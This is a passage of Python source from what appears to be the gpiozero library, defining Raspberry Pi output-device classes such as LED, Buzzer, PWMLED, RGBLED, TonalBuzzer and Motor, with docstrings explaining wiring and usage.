See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
super(OutputDevice, self).__init__(pin, pin_factory=pin_factory)
self._lock = Lock()
self.active_high = active_high
if initial_value is None:
self.pin.function = 'output'
else:
self.pin.output_with_state(self._value_to_state(initial_value))
def _value_to_state(self, value):
return bool(self._active_state if value else self._inactive_state)
def _write(self, value):
try:
self.pin.state = self._value_to_state(value)
except AttributeError:
self._check_open()
raise
def on(self):
"""
Turns the device on.
"""
self._write(True)
def off(self):
"""
Turns the device off.
"""
self._write(False)
def toggle(self):
"""
Reverse the state of the device. If it's on, turn it off; if it's off,
turn it on.
"""
with self._lock:
if self.is_active:
self.off()
else:
self.on()
@property
def value(self):
"""
Returns 1 if the device is currently active and 0 otherwise. Setting
this property changes the state of the device.
"""
return super(OutputDevice, self).value
@value.setter
def value(self, value):
self._write(value)
@property
def active_high(self):
"""
When :data:`True`, the :attr:`value` property is :data:`True` when the
device's :attr:`~GPIODevice.pin` is high. When :data:`False` the
:attr:`value` property is :data:`True` when the device's pin is low
(i.e. the value is inverted).
This property can be set after construction; be warned that changing it
will invert :attr:`value` (i.e. changing this property doesn't change
the device's pin state - it just changes how that state is
interpreted).
"""
return self._active_state
@active_high.setter
def active_high(self, value):
self._active_state = True if value else False
self._inactive_state = False if value else True
def __repr__(self):
try:
return '<gpiozero.%s object on pin %r, active_high=%s, is_active=%s>' % (
self.__class__.__name__, self.pin, self.active_high, self.is_active)
except:
return super(OutputDevice, self).__repr__()
class DigitalOutputDevice(OutputDevice):
"""
Represents a generic output device with typical on/off behaviour.
This class extends :class:`OutputDevice` with a :meth:`blink` method which
uses an optional background thread to handle toggling the device state
without further interaction.
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the device will be off initially. If
:data:`None`, the device will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the device will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=False,
pin_factory=None):
self._blink_thread = None
self._controller = None
super(DigitalOutputDevice, self).__init__(
pin, active_high, initial_value, pin_factory=pin_factory
)
@property
def value(self):
return super(DigitalOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def close(self):
self._stop_blink()
super(DigitalOutputDevice, self).close()
def on(self):
self._stop_blink()
self._write(True)
def off(self):
self._stop_blink()
self._write(False)
def blink(self, on_time=1, off_time=1, n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device, args=(on_time, off_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def _stop_blink(self):
if getattr(self, '_controller', None):
self._controller._stop_blink(self)
self._controller = None
if getattr(self, '_blink_thread', None):
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(self, on_time, off_time, n):
iterable = repeat(0) if n is None else repeat(0, n)
for _ in iterable:
self._write(True)
if self._blink_thread.stopping.wait(on_time):
break
self._write(False)
if self._blink_thread.stopping.wait(off_time):
break
class LED(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a light emitting diode
(LED).
Connect the cathode (short leg, flat side) of the LED to a ground pin;
connect the anode (longer leg) to a limiting resistor; connect the other
side of the limiting resistor to a GPIO pin (the limiting resistor can be
placed either side of the LED).
The following example will light the LED::
from gpiozero import LED
led = LED(17)
led.on()
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the LED will operate normally with the
circuit described above. If :data:`False` you should wire the cathode
to the GPIO pin, and the anode to a 3V3 pin (via a limiting resistor).
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the LED will be off initially. If
:data:`None`, the LED will be left in whatever state the pin is found
in when configured for output (warning: this can be on). If
:data:`True`, the LED will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
LED.is_lit = LED.is_active
class Buzzer(DigitalOutputDevice):
"""
Extends :class:`DigitalOutputDevice` and represents a digital buzzer
component.
.. note::
This interface is only capable of simple on/off commands, and is not
capable of playing a variety of tones (see :class:`TonalBuzzer`).
Connect the cathode (negative pin) of the buzzer to a ground pin; connect
the other side to any GPIO pin.
The following example will sound the buzzer::
from gpiozero import Buzzer
bz = Buzzer(3)
bz.on()
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the buzzer will operate normally with
the circuit described above. If :data:`False` you should wire the
cathode to the GPIO pin, and the anode to a 3V3 pin.
:type initial_value: bool or None
:param initial_value:
If :data:`False` (the default), the buzzer will be silent initially. If
:data:`None`, the buzzer will be left in whatever state the pin is
found in when configured for output (warning: this can be on). If
:data:`True`, the buzzer will be switched on initially.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
Buzzer.beep = Buzzer.blink
class PWMOutputDevice(OutputDevice):
"""
Generic output device configured for pulse-width modulation (PWM).
:type pin: int or str
:param pin:
The GPIO pin that the device is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If 0 (the default), the device's duty cycle will be 0 initially.
Other values between 0 and 1 can be specified as an initial duty cycle.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the device. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(
self, pin=None, active_high=True, initial_value=0, frequency=100,
pin_factory=None):
self._blink_thread = None
self._controller = None
if not 0 <= initial_value <= 1:
raise OutputDeviceBadValue("initial_value must be between 0 and 1")
super(PWMOutputDevice, self).__init__(
pin, active_high, initial_value=None, pin_factory=pin_factory
)
try:
# XXX need a way of setting these together
self.pin.frequency = frequency
self.value = initial_value
except:
self.close()
raise
def close(self):
try:
self._stop_blink()
except AttributeError:
pass
try:
self.pin.frequency = None
except AttributeError:
# If the pin's already None, ignore the exception
pass
super(PWMOutputDevice, self).close()
def _state_to_value(self, state):
return float(state if self.active_high else 1 - state)
def _value_to_state(self, value):
return float(value if self.active_high else 1 - value)
def _write(self, value):
if not 0 <= value <= 1:
raise OutputDeviceBadValue("PWM value must be between 0 and 1")
super(PWMOutputDevice, self)._write(value)
@property
def value(self):
"""
The duty cycle of the PWM device. 0.0 is off, 1.0 is fully on. Values
in between may be specified for varying levels of power in the device.
"""
return super(PWMOutputDevice, self).value
@value.setter
def value(self, value):
self._stop_blink()
self._write(value)
def on(self):
self._stop_blink()
self._write(1)
def off(self):
self._stop_blink()
self._write(0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is 0.0), this changes it to "fully" on (:attr:`value` is
1.0). If the device has a duty cycle (:attr:`value`) of 0.1, this will
toggle it to 0.9, and so on.
"""
self._stop_blink()
self.value = 1 - self.value
@property
def is_active(self):
"""
Returns :data:`True` if the device is currently active (:attr:`value`
is non-zero) and :data:`False` otherwise.
"""
return self.value != 0
@property
def frequency(self):
"""
The frequency of the pulses used with the PWM device, in Hz. The
default is 100Hz.
"""
return self.pin.frequency
@frequency.setter
def frequency(self, value):
self.pin.frequency = value
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(on_time, off_time, fade_in_time, fade_out_time, n)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(self, fade_in_time=1, fade_out_time=1, n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time, n, background
)
def _stop_blink(self):
if self._controller:
self._controller._stop_blink(self)
self._controller = None
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, n, fps=25):
sequence = []
if fade_in_time > 0:
sequence += [
(i * (1 / fps) / fade_in_time, 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((1, on_time))
if fade_out_time > 0:
sequence += [
(1 - (i * (1 / fps) / fade_out_time), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((0, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for value, delay in sequence:
self._write(value)
if self._blink_thread.stopping.wait(delay):
break
class TonalBuzzer(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a tonal buzzer.
:type pin: int or str
:param pin:
The GPIO pin which the buzzer is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param float initial_value:
If :data:`None` (the default), the buzzer will be off initially. Values
between -1 and 1 can be specified as an initial value for the buzzer.
:type mid_tone: int or str
:param mid_tone:
The tone which is represented the device's middle value (0). The
default is "A4" (MIDI note 69).
:param int octaves:
The number of octaves to allow away from the base note. The default is
1, meaning a value of -1 goes one octave below the base note, and one
above, i.e. from A3 to A5 with the default base note of A4.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. note::
Note that this class does not currently work with
:class:`~gpiozero.pins.pigpio.PiGPIOFactory`.
"""
def __init__(self, pin=None, initial_value=None, mid_tone=Tone("A4"),
octaves=1, pin_factory=None):
self._mid_tone = None
super(TonalBuzzer, self).__init__(
pwm_device=PWMOutputDevice(
pin=pin, pin_factory=pin_factory
), pin_factory=pin_factory)
try:
self._mid_tone = Tone(mid_tone)
if not (0 < octaves <= 9):
raise ValueError('octaves must be between 1 and 9')
self._octaves = octaves
try:
self.min_tone.note
except ValueError:
raise ValueError(
'%r is too low for %d octaves' %
(self._mid_tone, self._octaves))
try:
self.max_tone.note
except ValueError:
raise ValueError(
'%r is too high for %d octaves' %
(self._mid_tone, self._octaves))
self.value = initial_value
except:
self.close()
raise
def __repr__(self):
try:
if self.value is None:
return '<gpiozero.TonalBuzzer object on pin %r, silent>' % (
self.pwm_device.pin,)
else:
return '<gpiozero.TonalBuzzer object on pin %r, playing %s>' % (
self.pwm_device.pin, self.tone.note)
except:
return super(TonalBuzzer, self).__repr__()
def play(self, tone):
"""
Play the given *tone*. This can either be an instance of
:class:`~gpiozero.tones.Tone` or can be anything that could be used to
construct an instance of :class:`~gpiozero.tones.Tone`.
For example::
>>> from gpiozero import TonalBuzzer
>>> from gpiozero.tones import Tone
>>> b = TonalBuzzer(17)
>>> b.play(Tone("A4"))
>>> b.play(Tone(220.0)) # Hz
>>> b.play(Tone(60)) # middle C in MIDI notation
>>> b.play("A4")
>>> b.play(220.0)
>>> b.play(60)
"""
if tone is None:
self.value = None
else:
if not isinstance(tone, Tone):
tone = Tone(tone)
freq = tone.frequency
if self.min_tone.frequency <= tone <= self.max_tone.frequency:
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise ValueError("tone is out of the device's range")
def stop(self):
"""
Turn the buzzer off. This is equivalent to setting :attr:`value` to
:data:`None`.
"""
self.value = None
@property
def tone(self):
"""
Returns the :class:`~gpiozero.tones.Tone` that the buzzer is currently
playing, or :data:`None` if the buzzer is silent. This property can
also be set to play the specified tone.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
return Tone.from_frequency(self.pwm_device.pin.frequency)
@tone.setter
def tone(self, value):
self.play(value)
@property
def value(self):
"""
Represents the state of the buzzer as a value between -1 (representing
the minimum tone) and 1 (representing the maximum tone). This can also
be the special value :data:`None` indicating that the buzzer is
currently silent.
"""
if self.pwm_device.pin.frequency is None:
return None
else:
try:
return log2(
self.pwm_device.pin.frequency / self.mid_tone.frequency
) / self.octaves
except ZeroDivisionError:
return 0.0
@value.setter
def value(self, value):
if value is None:
self.pwm_device.pin.frequency = None
elif -1 <= value <= 1:
freq = self.mid_tone.frequency * 2 ** (self.octaves * value)
self.pwm_device.pin.frequency = freq
self.pwm_device.value = 0.5
else:
raise OutputDeviceBadValue(
'TonalBuzzer value must be between -1 and 1, or None')
@property
def is_active(self):
"""
Returns :data:`True` if the buzzer is currently playing, otherwise
:data:`False`.
"""
return self.value is not None
@property
def octaves(self):
"""
The number of octaves available (above and below mid_tone).
"""
return self._octaves
@property
def min_tone(self):
"""
The lowest tone that the buzzer can play, i.e. the tone played
when :attr:`value` is -1.
"""
return self._mid_tone.down(12 * self.octaves)
@property
def mid_tone(self):
"""
The middle tone available, i.e. the tone played when :attr:`value` is
0.
"""
return self._mid_tone
@property
def max_tone(self):
"""
The highest tone that the buzzer can play, i.e. the tone played when
:attr:`value` is 1.
"""
return self._mid_tone.up(12 * self.octaves)
class PWMLED(PWMOutputDevice):
"""
Extends :class:`PWMOutputDevice` and represents a light emitting diode
(LED) with variable brightness.
A typical configuration of such a device is to connect a GPIO pin to the
anode (long leg) of the LED, and the cathode (short leg) to ground, with
an optional resistor to prevent the LED from burning out.
:type pin: int or str
:param pin:
The GPIO pin which the LED is connected to. See :ref:`pin-numbering`
for valid pin numbers. If this is :data:`None` a :exc:`GPIODeviceError`
will be raised.
:param bool active_high:
If :data:`True` (the default), the :meth:`on` method will set the GPIO
to HIGH. If :data:`False`, the :meth:`on` method will set the GPIO to
LOW (the :meth:`off` method always does the opposite).
:param float initial_value:
If ``0`` (the default), the LED will be off initially. Other values
between 0 and 1 can be specified as an initial brightness for the LED.
Note that :data:`None` cannot be specified (unlike the parent class) as
there is no way to tell PWM not to alter the state of the pin.
:param int frequency:
The frequency (in Hz) of pulses emitted to drive the LED. Defaults
to 100Hz.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
pass
PWMLED.is_lit = PWMLED.is_active
class RGBLED(SourceMixin, Device):
"""
Extends :class:`Device` and represents a full color LED component (composed
of red, green, and blue LEDs).
Connect the common cathode (longest leg) to a ground pin; connect each of
the other legs (representing the red, green, and blue anodes) to any GPIO
pins. You should use three limiting resistors (one per anode).
The following code will make the LED yellow::
from gpiozero import RGBLED
led = RGBLED(2, 3, 4)
led.color = (1, 1, 0)
The `colorzero`_ library is also supported::
from gpiozero import RGBLED
from colorzero import Color
led = RGBLED(2, 3, 4)
led.color = Color('yellow')
:type red: int or str
:param red:
The GPIO pin that controls the red component of the RGB LED. See
:ref:`pin-numbering` for valid pin numbers. If this is :data:`None` a
:exc:`GPIODeviceError` will be raised.
:type green: int or str
:param green:
The GPIO pin that controls the green component of the RGB LED.
:type blue: int or str
:param blue:
The GPIO pin that controls the blue component of the RGB LED.
:param bool active_high:
Set to :data:`True` (the default) for common cathode RGB LEDs. If you
are using a common anode RGB LED, set this to :data:`False`.
:type initial_value: ~colorzero.Color or tuple
:param initial_value:
The initial color for the RGB LED. Defaults to black ``(0, 0, 0)``.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMLED` instances for
each component of the RGBLED. If :data:`False`, construct regular
:class:`LED` instances, which prevents smooth color graduations.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
.. _colorzero: https://colorzero.readthedocs.io/
"""
def __init__(
self, red=None, green=None, blue=None, active_high=True,
initial_value=(0, 0, 0), pwm=True, pin_factory=None):
self._leds = ()
self._blink_thread = None
if not all(p is not None for p in [red, green, blue]):
raise GPIOPinMissing('red, green, and blue pins must be provided')
LEDClass = PWMLED if pwm else LED
super(RGBLED, self).__init__(pin_factory=pin_factory)
self._leds = tuple(
LEDClass(pin, active_high, pin_factory=pin_factory)
for pin in (red, green, blue)
)
self.value = initial_value
def close(self):
if getattr(self, '_leds', None):
self._stop_blink()
for led in self._leds:
led.close()
self._leds = ()
super(RGBLED, self).close()
@property
def closed(self):
return len(self._leds) == 0
@property
def value(self):
"""
Represents the color of the LED as an RGB 3-tuple of ``(red, green,
blue)`` where each value is between 0 and 1 if *pwm* was :data:`True`
when the class was constructed (and only 0 or 1 if not).
For example, red would be ``(1, 0, 0)`` and yellow would be ``(1, 1,
0)``, while orange would be ``(1, 0.5, 0)``.
"""
return tuple(led.value for led in self._leds)
@value.setter
def value(self, value):
for component in value:
if not 0 <= component <= 1:
raise OutputDeviceBadValue(
'each RGB color component must be between 0 and 1')
if isinstance(self._leds[0], LED):
if component not in (0, 1):
raise OutputDeviceBadValue(
'each RGB color component must be 0 or 1 with non-PWM '
'RGBLEDs')
self._stop_blink()
for led, v in zip(self._leds, value):
led.value = v
@property
def is_active(self):
"""
Returns :data:`True` if the LED is currently active (not black) and
:data:`False` otherwise.
"""
return self.value != (0, 0, 0)
is_lit = is_active
@property
def color(self):
"""
Represents the color of the LED as a :class:`~colorzero.Color` object.
"""
return Color(*self.value)
@color.setter
def color(self, value):
self.value = value
@property
def red(self):
"""
Represents the red element of the LED as a :class:`~colorzero.Red`
object.
"""
return self.color.red
@red.setter
def red(self, value):
self._stop_blink()
r, g, b = self.value
self.value = value, g, b
@property
def green(self):
"""
Represents the green element of the LED as a :class:`~colorzero.Green`
object.
"""
return self.color.green
@green.setter
def green(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, value, b
@property
def blue(self):
"""
Represents the blue element of the LED as a :class:`~colorzero.Blue`
object.
"""
return self.color.blue
@blue.setter
def blue(self, value):
self._stop_blink()
r, g, b = self.value
self.value = r, g, value
def on(self):
"""
Turn the LED on. This equivalent to setting the LED color to white
``(1, 1, 1)``.
"""
self.value = (1, 1, 1)
def off(self):
"""
Turn the LED off. This is equivalent to setting the LED color to black
``(0, 0, 0)``.
"""
self.value = (0, 0, 0)
def toggle(self):
"""
Toggle the state of the device. If the device is currently off
(:attr:`value` is ``(0, 0, 0)``), this changes it to "fully" on
(:attr:`value` is ``(1, 1, 1)``). If the device has a specific color,
this method inverts the color.
"""
r, g, b = self.value
self.value = (1 - r, 1 - g, 1 - b)
def blink(
self, on_time=1, off_time=1, fade_in_time=0, fade_out_time=0,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device turn on and off repeatedly.
:param float on_time:
Number of seconds on. Defaults to 1 second.
:param float off_time:
Number of seconds off. Defaults to 1 second.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 0. Must be 0 if
*pwm* was :data:`False` when the class was constructed
(:exc:`ValueError` will be raised if not).
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to blink; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue blinking and return immediately. If :data:`False`, only
return when the blink is finished (warning: the default value of
*n* will result in this method never returning).
"""
if isinstance(self._leds[0], LED):
if fade_in_time:
raise ValueError('fade_in_time must be 0 with non-PWM RGBLEDs')
if fade_out_time:
raise ValueError('fade_out_time must be 0 with non-PWM RGBLEDs')
self._stop_blink()
self._blink_thread = GPIOThread(
target=self._blink_device,
args=(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n
)
)
self._blink_thread.start()
if not background:
self._blink_thread.join()
self._blink_thread = None
def pulse(
self, fade_in_time=1, fade_out_time=1,
on_color=(1, 1, 1), off_color=(0, 0, 0), n=None, background=True):
"""
Make the device fade in and out repeatedly.
:param float fade_in_time:
Number of seconds to spend fading in. Defaults to 1.
:param float fade_out_time:
Number of seconds to spend fading out. Defaults to 1.
:type on_color: ~colorzero.Color or tuple
:param on_color:
The color to use when the LED is "on". Defaults to white.
:type off_color: ~colorzero.Color or tuple
:param off_color:
The color to use when the LED is "off". Defaults to black.
:type n: int or None
:param n:
Number of times to pulse; :data:`None` (the default) means forever.
:param bool background:
If :data:`True` (the default), start a background thread to
continue pulsing and return immediately. If :data:`False`, only
return when the pulse is finished (warning: the default value of
*n* will result in this method never returning).
"""
on_time = off_time = 0
self.blink(
on_time, off_time, fade_in_time, fade_out_time,
on_color, off_color, n, background
)
def _stop_blink(self, led=None):
# If this is called with a single led, we stop all blinking anyway
if self._blink_thread:
self._blink_thread.stop()
self._blink_thread = None
def _blink_device(
self, on_time, off_time, fade_in_time, fade_out_time, on_color,
off_color, n, fps=25):
# Define a simple lambda to perform linear interpolation between
# off_color and on_color
lerp = lambda t, fade_in: tuple(
(1 - t) * off + t * on
if fade_in else
(1 - t) * on + t * off
for off, on in zip(off_color, on_color)
)
sequence = []
if fade_in_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_in_time, True), 1 / fps)
for i in range(int(fps * fade_in_time))
]
sequence.append((on_color, on_time))
if fade_out_time > 0:
sequence += [
(lerp(i * (1 / fps) / fade_out_time, False), 1 / fps)
for i in range(int(fps * fade_out_time))
]
sequence.append((off_color, off_time))
sequence = (
cycle(sequence) if n is None else
chain.from_iterable(repeat(sequence, n))
)
for l in self._leds:
l._controller = self
for value, delay in sequence:
for l, v in zip(self._leds, value):
l._write(v)
if self._blink_thread.stopping.wait(delay):
break
class Motor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor
connected to a bi-directional motor driver circuit (i.e. an `H-bridge`_).
Attach an `H-bridge`_ motor controller to your Pi; connect a power source
(e.g. a battery pack or the 5V pin) to the controller; connect the outputs
of the controller board to the two terminals of the motor; connect the
inputs of the controller board to two GPIO pins.
.. _H-bridge: https://en.wikipedia.org/wiki/H_bridge
The following code will make the motor turn "forwards"::
from gpiozero import Motor
motor = Motor(17, 18)
motor.forward()
:type forward: int or str
:param forward:
The GPIO pin that the forward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type backward: int or str
:param backward:
The GPIO pin that the backward input of the motor driver chip is
connected to. See :ref:`pin-numbering` for valid pin numbers. If this
is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str or None
:param enable:
The GPIO pin that enables the motor. Required for *some* motor
controller boards. See :ref:`pin-numbering` for valid pin numbers.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, forward=None, backward=None, enable=None, pwm=True,
pin_factory=None):
if not all(p is not None for p in [forward, backward]):
raise GPIOPinMissing(
'forward and backward pins must be provided'
)
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
devices = OrderedDict((
('forward_device', PinClass(forward)),
('backward_device', PinClass(backward)),
))
if enable is not None:
devices['enable_device'] = DigitalOutputDevice(enable,
initial_value=True)
super(Motor, self).__init__(_order=devices.keys(), **devices)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward), with 0 representing
stopped.
"""
return self.forward_device.value - self.backward_device.value
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
try:
self.forward(value)
except ValueError as e:
raise OutputDeviceBadValue(e)
elif value < 0:
try:
self.backward(-value)
except ValueError as e:
raise OutputDeviceBadValue(e)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('forward speed must be between 0 and 1')
if isinstance(self.forward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.backward_device.off()
self.forward_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed) if *pwm* was
:data:`True` when the class was constructed (and only 0 or 1 if
not).
"""
if not 0 <= speed <= 1:
raise ValueError('backward speed must be between 0 and 1')
if isinstance(self.backward_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.forward_device.off()
self.backward_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
"""
self.forward_device.off()
self.backward_device.off()
class PhaseEnableMotor(SourceMixin, CompositeDevice):
"""
Extends :class:`CompositeDevice` and represents a generic motor connected
to a Phase/Enable motor driver circuit; the phase of the driver controls
whether the motor turns forwards or backwards, while enable controls the
speed with PWM.
The following code will make the motor turn "forwards"::
from gpiozero import PhaseEnableMotor
motor = PhaseEnableMotor(12, 5)
motor.forward()
:type phase: int or str
:param phase:
The GPIO pin that the phase (direction) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:type enable: int or str
:param enable:
The GPIO pin that the enable (speed) input of the motor driver chip
is connected to. See :ref:`pin-numbering` for valid pin numbers. If
this is :data:`None` a :exc:`GPIODeviceError` will be raised.
:param bool pwm:
If :data:`True` (the default), construct :class:`PWMOutputDevice`
instances for the motor controller pins, allowing both direction and
variable speed control. If :data:`False`, construct
:class:`DigitalOutputDevice` instances, allowing only direction
control.
:type pin_factory: Factory or None
:param pin_factory:
See :doc:`api_pins` for more information (this is an advanced feature
which most users can ignore).
"""
def __init__(self, phase=None, enable=None, pwm=True, pin_factory=None):
if not all([phase, enable]):
raise GPIOPinMissing('phase and enable pins must be provided')
PinClass = PWMOutputDevice if pwm else DigitalOutputDevice
super(PhaseEnableMotor, self).__init__(
phase_device=DigitalOutputDevice(phase, pin_factory=pin_factory),
enable_device=PinClass(enable, pin_factory=pin_factory),
_order=('phase_device', 'enable_device'),
pin_factory=pin_factory
)
@property
def value(self):
"""
Represents the speed of the motor as a floating point value between -1
(full speed backward) and 1 (full speed forward).
"""
return (
-self.enable_device.value
if self.phase_device.is_active else
self.enable_device.value
)
@value.setter
def value(self, value):
if not -1 <= value <= 1:
raise OutputDeviceBadValue("Motor value must be between -1 and 1")
if value > 0:
self.forward(value)
elif value < 0:
self.backward(-value)
else:
self.stop()
@property
def is_active(self):
"""
Returns :data:`True` if the motor is currently running and
:data:`False` otherwise.
"""
return self.value != 0
def forward(self, speed=1):
"""
Drive the motor forwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'forward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.off()
self.enable_device.value = speed
def backward(self, speed=1):
"""
Drive the motor backwards.
:param float speed:
The speed at which the motor should turn. Can be any value between
0 (stopped) and the default 1 (maximum speed).
"""
if isinstance(self.enable_device, DigitalOutputDevice):
if speed not in (0, 1):
raise ValueError(
'backward speed must be 0 or 1 with non-PWM Motors')
self.enable_device.off()
self.phase_device.on()
self.enable_device.value = speed
def reverse(self):
"""
Reverse the current direction of the motor. If the motor is currently
idle this does nothing. Otherwise, the motor's direction will be
reversed at the current speed.
"""
self.value = -self.value
def stop(self):
"""
Stop the motor.
